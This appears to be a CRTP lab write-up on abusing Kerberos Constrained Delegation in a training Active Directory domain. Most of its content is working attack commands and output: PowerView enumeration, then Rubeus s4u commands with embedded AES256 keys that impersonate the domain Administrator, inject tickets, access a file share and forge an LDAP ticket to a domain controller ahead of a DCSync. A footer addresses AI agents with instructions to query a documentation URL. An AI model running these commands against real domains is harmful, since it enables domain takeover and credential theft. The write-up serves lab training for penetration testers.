# 16 - LO1️6️

## Tasks

1 - Enumerate users in the domain for whom Constrained Delegation is enabled

* For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
* Pass the ticket and access the service.

2 - Enumerate computer accounts in the domain for which Constrained Delegation is enabled

* For such a user, request a TGT from the DC.
* Obtain an alternate TGS for LDAP service on the target machine.
* Use the TGS for executing DCSync attack.

Flag 26 \[dcorp-adminsrv] - Value of msds-allowedtodelegate to attribute of dcorp-adminsrv 🚩

Flag 27 \[dcorp-adminsrv] - Alternate service accessed on dcorp-dc by abusing Constrained delegation on dcorp-adminsrv 🚩

## Solutions

### 1 - Enumerate users in the domain for whom Constrained Delegation is enabled

To enumerate users with constrained delegation we can use PowerView. Run the below command from a PowerShell session started using Invisi-Shell:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -TrustedToAuth
```

```powershell
logoncount               : 7
badpasswordtime          : 12/31/1600 4:00:00 PM
distinguishedname        : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass              : {top, person, organizationalPerson, user}
displayname              : web svc
lastlogontimestamp       : 5/18/2025 2:35:14 PM
userprincipalname        : websvc
whencreated              : 11/14/2022 12:42:13 PM
samaccountname           : websvc
codepage                 : 0
samaccounttype           : USER_OBJECT
accountexpires           : NEVER
countrycode              : 0
whenchanged              : 5/18/2025 9:35:14 PM
instancetype             : 4
usncreated               : 38071
objectguid               : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn                       : svc
lastlogoff               : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory           : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata    : {12/5/2024 12:47:28 PM, 11/14/2022 12:42:13 PM, 1/1/1601 12:00:01 AM}
serviceprincipalname     : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname                : web
usnchanged               : 349838
lastlogon                : 5/18/2025 2:51:48 PM
badpwdcount              : 0
cn                       : web svc
useraccountcontrol       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid                : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid           : 513
pwdlastset               : 11/14/2022 4:42:13 AM
name                     : web svc
```

<figure><img src="/files/KArqhlLW0RqaxnqWXjut" alt=""><figcaption></figcaption></figure>

We already have secrets of websvc from dcorp-admisrv machine. We can either use Kekeo or Rubeus to abuse that.

In the below command (into an administrative cmd), we request get a TGS for websvc as the Domain Administrator - Administrator. Then the TGS used to access the service specified in the /msdsspn parameter (which is filesystem on dcorp-mssql):

```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
```

and check if the TGS is injected using: `klist`

<figure><img src="/files/lapMzwDuBwX6LPDyBMvs" alt=""><figcaption></figcaption></figure>

Try accessing filesystem on dcorp-mssql:

<figure><img src="/files/4m9TldczdPYq4khBKxEz" alt=""><figcaption></figcaption></figure>

### 2 - Enumerate computer accounts in the domain for which Constrained Delegation is enabled

Continue, to enumerate the computer accounts with constrained delegation enabled using PowerView: `Get-DomainComputer -TrustedToAuth`

```powershell
pwdlastset                    : 11/11/2022 11:16:12 PM
logoncount                    : 97
badpasswordtime               : 5/18/2025 3:28:12 PM
distinguishedname             : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 5/11/2025 9:04:27 PM
whencreated                   : 11/12/2022 7:16:12 AM
samaccountname                : DCORP-ADMINSRV$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
whenchanged                   : 5/12/2025 4:04:27 AM
accountexpires                : NEVER
countrycode                   : 0
operatingsystem               : Windows Server 2022 Datacenter
instancetype                  : 4
useraccountcontrol            : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
objectguid                    : 2e036483-7f45-4416-8a62-893618556370
operatingsystemversion        : 10.0 (20348)
lastlogoff                    : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto      : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata         : {12/5/2024 12:47:28 PM, 11/15/2022 4:16:45 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {WSMAN/dcorp-adminsrv, WSMAN/dcorp-adminsrv.dollarcorp.moneycorp.local,
                                TERMSRV/DCORP-ADMINSRV, TERMSRV/dcorp-adminsrv.dollarcorp.moneycorp.local...}
usncreated                    : 13891
usnchanged                    : 324081
lastlogon                     : 5/18/2025 3:29:49 PM
badpwdcount                   : 0
cn                            : DCORP-ADMINSRV
msds-supportedencryptiontypes : 28
objectsid                     : S-1-5-21-719815819-3726368948-3917688648-1105
primarygroupid                : 515
iscriticalsystemobject        : False
name                          : DCORP-ADMINSRV
dnshostname                   : dcorp-adminsrv.dollarcorp.moneycorp.local
```

<figure><img src="/files/JF99HvFgqNiE9uQDt61k" alt=""><figcaption></figcaption></figure>

We have the AES keys of dcorp-adminsrv$ from dcorp-adminsrv machine. Run the below command from an elevated command prompt as SafetyKatz, that we will use for DCSync, would need that:

```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```

<figure><img src="/files/YshpDgAnBPKZrxrNiPhd" alt=""><figcaption></figcaption></figure>

### Flag 26 \[dcorp-adminsrv] - Value of msds-allowedtodelegate to attribute of dcorp-adminsrv 🚩

The flag it the value of msds-allowedtodelegate to attribute of dcorp-adminsrv: `{TIME/dcorp-dc.dollarcorp.XXXXXXXXXXXXXXXXXXXXXXXXXX}`

### Flag 27 \[dcorp-adminsrv] - Alternate service accessed on dcorp-dc by abusing Constrained delegation on dcorp-adminsrv 🚩

We can discover the alternate service using the following command:

```
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/crtp-notes/readme/lab/16-lo1-6.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.